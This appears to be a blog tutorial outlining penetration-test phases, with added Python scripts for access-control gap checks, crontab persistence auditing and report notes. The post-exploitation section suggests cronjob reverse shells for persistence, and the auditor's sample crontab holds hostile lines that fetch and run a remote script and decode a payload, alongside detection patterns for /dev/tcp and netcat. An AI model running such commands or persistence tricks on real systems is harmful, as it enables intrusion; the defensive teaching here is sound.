Nowadays, organizing yourself is becoming crucial in your everyday life. From diet to training to work, good planning is key when you’re trying to chase your goals efficiently. In this case, our main goal is to perform a penetration test on a system, and there is a well-known way to structure it in our community:
- Information gathering/reconnaissance
- Vulnerability scan
- Attack phase
- Post-exploitation
- Reporting
So, let’s describe each one of these.
Information gathering/reconnaissance
As the title says, a penetration tester must gather all the information he/she can in order to move effectively into the next steps. Knowing your target’s business is very important, and you should spend as much time as you can analyzing it.
Imagine that your target is an e-commerce website. In this case, you should take your time and navigate through all the pages (yes, all of them), paying attention to URL formats, existing forms, what the product is, how it is sold, etc. Let’s say that this e-commerce site has three plans: free, standard and premium. If possible, you should have an account for each one of these and see what you can do with each. Remember that every new feature you discover increases the attack surface of the target’s system.
After learning everything about the product, I would start by identifying open ports, brute-forcing directories, searching for possible subdomains, mapping the website’s network, etc. Usually, you should be asking these kinds of questions:
- Which endpoints are called and when? Is there a difference in the endpoint when buying as a standard user? And as a premium one?
- Which cookies are used and what is the difference between users? Is there any place on the website where I can upload a file? In which format?
- What is the framework and libraries this site is using? In which versions are they?
- Is there a way that I could find some more info around the internet? Tip: Check this out https://github.com/laramies/theHarvester
Now that you have all the information and you have squeezed all the product and technical knowledge about your target, it’s time to go to the next phase!
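One way to work systematically through the "does the endpoint differ between plans" question is to note, for every plan, which endpoints answer 2xx, and then compare that matrix with what the product documentation says each plan should get. Any endpoint a lower plan can reach is a broken access control finding for the report. The script below is an added example, not code from the original post; the plan names, endpoints, HTTP statuses and policy are constructed stand-ins for what you would collect while browsing each plan through an intercepting proxy.

```python
from collections import defaultdict

# Plans ordered from least to most privileged (constructed for the e-commerce example).
PLAN_RANK = {"anonymous": 0, "free": 1, "standard": 2, "premium": 3}

# Constructed observations: (plan, method, path, HTTP status) as you would note them
# while browsing each plan through an intercepting proxy.
OBSERVED = [
    ("anonymous", "GET", "/api/orders", 302),
    ("free", "GET", "/api/orders", 200),
    ("standard", "GET", "/api/orders", 200),
    ("premium", "GET", "/api/orders", 200),
    ("anonymous", "GET", "/api/reports/export", 401),
    ("free", "GET", "/api/reports/export", 200),      # documented as premium-only
    ("premium", "GET", "/api/reports/export", 200),
    ("free", "POST", "/api/admin/coupons", 403),
    ("premium", "POST", "/api/admin/coupons", 200),   # not mentioned in the documented policy
]

# Minimum plan the (constructed) product documentation gives for each endpoint.
POLICY = {
    ("GET", "/api/orders"): "free",
    ("GET", "/api/reports/export"): "premium",
}


def build_access_matrix(observations):
    """Return {(method, path): {plan: reachable}}. Only a 2xx counts as reachable,
    so a redirect to the login page or a 401/403 is treated as denied."""
    matrix = defaultdict(dict)
    for plan, method, path, status in observations:
        matrix[(method, path)][plan] = 200 <= status < 300
    return dict(matrix)


def minimum_plan(row):
    """Least privileged plan that could reach the endpoint, or None if nobody could."""
    reachable = [plan for plan, ok in row.items() if ok]
    return min(reachable, key=PLAN_RANK.__getitem__) if reachable else None


def find_access_gaps(matrix, policy):
    """Compare observed access with the documented policy. Returns a list of
    (endpoint, description, lowest_plan) for endpoints reachable below the
    required plan and for endpoints the policy does not mention at all."""
    gaps = []
    for endpoint, row in sorted(matrix.items()):
        lowest = minimum_plan(row)
        required = policy.get(endpoint)
        if required is None:
            gaps.append((endpoint, "undocumented endpoint", lowest))
        elif lowest is not None and PLAN_RANK[lowest] < PLAN_RANK[required]:
            gaps.append((endpoint, f"reachable by '{lowest}', policy requires '{required}'", lowest))
    return gaps


if __name__ == "__main__":
    for endpoint, why, lowest in find_access_gaps(build_access_matrix(OBSERVED), POLICY):
        print(f"{endpoint[0]} {endpoint[1]}: {why} (lowest plan observed: {lowest})")
```

Endpoints that show up in the observations but not in the policy are reported too: an undocumented admin endpoint is worth a question to the client even when only the top plan can reach it.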
Vulnerability scan
This phase is usually performed with software like BurpSuite, Nessus, Nikto, SearchSploit and many more. Your objective is to check whether the current system (which you already know from the first step) has known vulnerabilities that can be exploited “automatically” (because a script to do it already exists). As a second step, you should also look for vulnerabilities such as XSS, XXE, SSRF or CSRF on the website, and yes, there are tools to help you with that too.
To be honest, if you have the money you should aim to grab a BurpSuite Pro license, since it has a bunch of useful tools like a spider, intruder, repeater, plugins, etc. Otherwise, you should look for different options. I’m currently looking for a free (or at least much cheaper) setup that can substitute for it, so if you know of one, let me know!
Attack phase
As soon as you discover a vulnerability that could get you into the system somehow (like uploading a PHP file that contains a reverse TCP shell script), you enter the attack phase. In this phase, once you have access to the system, you must analyze what state your user is in when you land in the target’s console. Now it’s time to gather all the information you can about the system you’re connected to:
- How many users does the system have and which one are you?
- Which services and/or processes are running?
- Is iptables configured? Can you check for other devices in the same network?
- Very important: Are there any logs and/or backups that could be unencrypted? Maybe a second drive?
- Also very important: Are there any cronjobs? public/private keys that you can access?
Post-exploitation
The last questions above (if you find something, of course) take you into the post-exploitation phase. In this one, your objective is to maintain access to the system: you should be able to get back into that server as many times as you want. Some ideas that come to my mind are:
- Using cronjobs + reverse shell (in case the machine is restarted)
- Start service with your script
- Take advantage of existing automated scripts that you could modify
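From the defender’s side, the persistence ideas above are exactly what a blue team audits for, and knowing those signals helps you write a useful finding for the report. The script below is an added example, not code from the original post: it parses a crontab and flags entries that carry common indicators of cron-based persistence (commands run from world-writable directories, decoded payloads, remote content piped to a shell, network redirections, and anything tied to @reboot, which is the case the post mentions for surviving a restart). The sample crontab and the indicator list are constructed for the example and should be tuned for a real environment.

```python
import re
from dataclasses import dataclass, field

# Indicators a blue team commonly associates with cron-based persistence.
# Constructed list for this example; extend it with patterns from your own environment.
INDICATORS = [
    (re.compile(r"/dev/tcp/"), "bash network redirection"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat executing a program"),
    (re.compile(r"\b(ba)?sh\s+-i\b"), "interactive shell"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "remote content piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "base64-decoded payload"),
    (re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/"), "executes from world-writable dir"),
]

# Schedule shortcuts cron accepts in place of the five time fields.
SCHEDULE_ALIASES = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@hourly"}

# Constructed sample crontab: two routine jobs and three entries a defender should look at.
SAMPLE_CRONTAB = """\
# constructed sample crontab for this example
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
@reboot /tmp/.cache/sync >/dev/null 2>&1
*/10 * * * * echo 'ZWNobyBoaQ==' | base64 -d | sh
30 2 * * * curl -s http://203.0.113.5/x.sh | sh
"""


@dataclass
class CronEntry:
    lineno: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def parse_crontab(text):
    """Yield a CronEntry per job line; blank lines, comments and VAR=value lines are skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if parts[0] not in SCHEDULE_ALIASES or len(parts) < 2:
                continue
            yield CronEntry(lineno, parts[0], parts[1])
        else:
            parts = line.split(None, 5)          # five time fields, then the command
            if len(parts) < 6:
                continue
            yield CronEntry(lineno, " ".join(parts[:5]), parts[5])


def audit_crontab(text):
    """Return the entries whose command matches at least one indicator, with the reasons attached.
    A matching job scheduled with @reboot gets an extra reason, since it survives restarts."""
    flagged = []
    for entry in parse_crontab(text):
        for pattern, reason in INDICATORS:
            if pattern.search(entry.command):
                entry.reasons.append(reason)
        if entry.reasons and entry.schedule == "@reboot":
            entry.reasons.append("survives reboot (@reboot)")
        if entry.reasons:
            flagged.append(entry)
    return flagged


if __name__ == "__main__":
    for entry in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {entry.lineno}: {entry.schedule} {entry.command}")
        for reason in entry.reasons:
            print(f"    - {reason}")
```

The same parser works on the output of `crontab -l` for each user and on the files under /etc/cron.d; the indicators are deliberately broad, so a hit is a prompt to read the job, not a verdict.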
Reporting
When the penetration test is finished, the last step is collecting all the vulnerabilities you found and creating a report. The format of the report could be a PDF or even a video showing what you found, and it should be as specific as possible. I don’t have much experience writing pentest reports, so I won’t dig into this, but if you have any tips, just let me know!
Bonus tip
I just want to mention that taking notes is the most important thing you should do when performing a penetration test. You want to avoid repetition as much as possible. For example, you shouldn’t have to run Nmap again to check for open ports if you did it before. Save all the information you can so you can just check it in the future and repeat steps only if you feel that the system has changed.
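As an added example (not code from the original post), here is a small notebook that keeps scan results with a timestamp, so you can tell whether a previous Nmap run is still fresh before repeating it, de-duplicates findings, and renders them into a Markdown report sorted by severity with the specifics the Reporting section asks for (affected asset, evidence, reproduction steps, remediation). The target name, findings and timestamps are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Severity labels in the order they appear in the report.
SEVERITY_ORDER = ["critical", "high", "medium", "low", "info"]


@dataclass
class Finding:
    title: str
    severity: str      # one of SEVERITY_ORDER
    affected: str      # host, URL or parameter
    evidence: str      # request/response excerpt, screenshot path, ...
    steps: list        # reproduction steps, in order
    remediation: str


class PentestNotebook:
    """Timestamped scan results plus a de-duplicated findings list that renders to Markdown."""

    def __init__(self, target):
        self.target = target
        self.scans = {}       # step name -> (timestamp, result summary)
        self.findings = []

    def record_scan(self, step, result, when=None):
        self.scans[step] = (when or datetime.now(), result)

    def needs_rerun(self, step, max_age=timedelta(days=1), now=None):
        """True if the step was never run or its stored result is older than max_age."""
        if step not in self.scans:
            return True
        when, _ = self.scans[step]
        return (now or datetime.now()) - when > max_age

    def add_finding(self, finding):
        """Store the finding; returns False if the same issue on the same asset is already recorded."""
        if finding.severity not in SEVERITY_ORDER:
            raise ValueError(f"unknown severity: {finding.severity}")
        key = (finding.title.lower(), finding.affected)
        if any((f.title.lower(), f.affected) == key for f in self.findings):
            return False
        self.findings.append(finding)
        return True

    def render_report(self):
        ordered = sorted(self.findings, key=lambda f: SEVERITY_ORDER.index(f.severity))
        lines = [f"# Penetration test report: {self.target}", "", "## Summary", ""]
        for sev in SEVERITY_ORDER:
            count = sum(1 for f in ordered if f.severity == sev)
            if count:
                lines.append(f"- {sev}: {count}")
        lines += ["", "## Scans performed", ""]
        for step, (when, result) in self.scans.items():
            lines.append(f"- {step} ({when:%Y-%m-%d %H:%M}): {result}")
        lines += ["", "## Findings"]
        for i, f in enumerate(ordered, 1):
            lines += ["", f"### {i}. [{f.severity.upper()}] {f.title}", "",
                      f"Affected: {f.affected}", "", f"Evidence: `{f.evidence}`", "",
                      "Steps to reproduce:", ""]
            lines += [f"{n}. {step}" for n, step in enumerate(f.steps, 1)]
            lines += ["", f"Remediation: {f.remediation}"]
        return "\n".join(lines) + "\n"


def demo():
    """Constructed walk-through: one scan, two findings, one duplicate, and freshness checks."""
    t0 = datetime(2024, 1, 1, 12, 0)
    nb = PentestNotebook("shop.example (constructed target)")
    nb.record_scan("nmap", "open ports 80, 443", when=t0)
    low = Finding("Session cookie without HttpOnly", "low", "https://shop.example/login",
                  "Set-Cookie: session=...; Path=/", ["Log in", "Inspect the Set-Cookie header"],
                  "Set the HttpOnly and Secure flags on the session cookie.")
    high = Finding("Premium export reachable by free plan", "high", "GET /api/reports/export",
                   "HTTP 200 with a free-plan session", ["Log in as a free user", "Request /api/reports/export"],
                   "Enforce the plan check server-side, not only in the UI.")
    return {
        "notebook": nb,
        "added": [nb.add_finding(low), nb.add_finding(high), nb.add_finding(low)],  # third is a duplicate
        "rerun_fresh": nb.needs_rerun("nmap", now=t0 + timedelta(hours=2)),
        "rerun_stale": nb.needs_rerun("nmap", now=t0 + timedelta(days=3)),
        "rerun_missing": nb.needs_rerun("dirb", now=t0),
        "report": nb.render_report(),
    }


if __name__ == "__main__":
    print(demo()["report"])
```

The `needs_rerun` check is the bonus tip in code: the step is repeated only when it was never done or when the stored result is older than the age you are willing to trust for that target.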
Acronyms and concepts:
- XSS: Cross-Site Scripting
- CSRF: Cross-Site Request Forgery
- XXE: XML External Entity
- SSRF: Server-Side Request Forgery
- Reverse shell: A shell opened from the target machine that connects back to our own. Here you have some examples: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet. I’ll talk about this in the future.